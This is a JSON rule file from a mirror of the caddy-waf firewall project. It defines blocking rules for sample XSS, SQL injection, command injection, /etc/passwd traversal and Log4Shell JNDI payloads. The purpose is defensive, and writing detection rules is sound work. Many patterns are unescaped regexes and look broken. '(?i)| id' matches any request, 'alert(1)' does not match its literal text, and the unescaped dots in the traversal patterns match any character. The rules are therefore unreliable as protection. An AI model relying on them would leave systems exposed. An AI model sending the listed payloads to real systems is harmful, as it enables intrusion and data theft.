mirror/caddy-waf
1
0
Fork 0
mirror of https://github.com/fabriziosalmi/caddy-waf.git synced 2025-12-23 22:27:46 -05:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
caddy-waf/rules/vulnerability.json
fab ceab17b56a Create vulnerability.json
2025-01-13 12:45:18 +01:00

233 lines
4.7 KiB
JSON
Raw Permalink Blame History

[
{
"id": "xss-0",
"phase": 2,
"pattern": "(?i)<script>alert(1)</script>",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects xss attack payload: <script>alert(1)</script>"
},
{
"id": "xss-1",
"phase": 2,
"pattern": "(?i)<img src=x onerror=alert(1)>",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects xss attack payload: <img src=x onerror=alert(1)>"
},
{
"id": "xss-2",
"phase": 2,
"pattern": "(?i)javascript:alert(1)",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects xss attack payload: javascript:alert(1)"
},
{
"id": "xss-3",
"phase": 2,
"pattern": "(?i)data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects xss attack payload: data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
},
{
"id": "sqli-4",
"phase": 2,
"pattern": "(?i)1' OR '1'='1",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: 1' OR '1'='1"
},
{
"id": "sqli-5",
"phase": 2,
"pattern": "(?i)'; SELECT * FROM users;",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: '; SELECT * FROM users;"
},
{
"id": "sqli-6",
"phase": 2,
"pattern": "(?i)\" OR \"1\"=\"1",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: \" OR \"1\"=\"1"
},
{
"id": "sqli-7",
"phase": 2,
"pattern": "(?i)UNION SELECT 1,2,3;",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects sqli attack payload: UNION SELECT 1,2,3;"
},
{
"id": "rce-8",
"phase": 2,
"pattern": "(?i)`whoami`",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: `whoami`"
},
{
"id": "rce-9",
"phase": 2,
"pattern": "(?i)$(whoami)",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: $(whoami)"
},
{
"id": "rce-10",
"phase": 2,
"pattern": "(?i); ls -la;",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: ; ls -la;"
},
{
"id": "rce-11",
"phase": 2,
"pattern": "(?i)| id",
"targets": [
"ARGS",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects rce attack payload: | id"
},
{
"id": "lfi-12",
"phase": 2,
"pattern": "(?i)../etc/passwd",
"targets": [
"URI"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects lfi attack payload: ../etc/passwd"
},
{
"id": "lfi-13",
"phase": 2,
"pattern": "(?i)../../../../etc/passwd",
"targets": [
"URI"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects lfi attack payload: ../../../../etc/passwd"
},
{
"id": "log4j-14",
"phase": 2,
"pattern": "(?i)${jndi:ldap://example.com/a}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects log4j attack payload: ${jndi:ldap://example.com/a}"
},
{
"id": "log4j-15",
"phase": 2,
"pattern": "(?i)${jndi:rmi://example.com/b}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects log4j attack payload: ${jndi:rmi://example.com/b}"
},
{
"id": "log4j-16",
"phase": 2,
"pattern": "(?i)${jndi:dns://example.com/c}",
"targets": [
"ARGS",
"BODY",
"HEADERS"
],
"severity": "HIGH",
"action": "block",
"score": 7,
"description": "Detects log4j attack payload: ${jndi:dns://example.com/c}"
}
]
Reference in New Issue View Git Blame Copy Permalink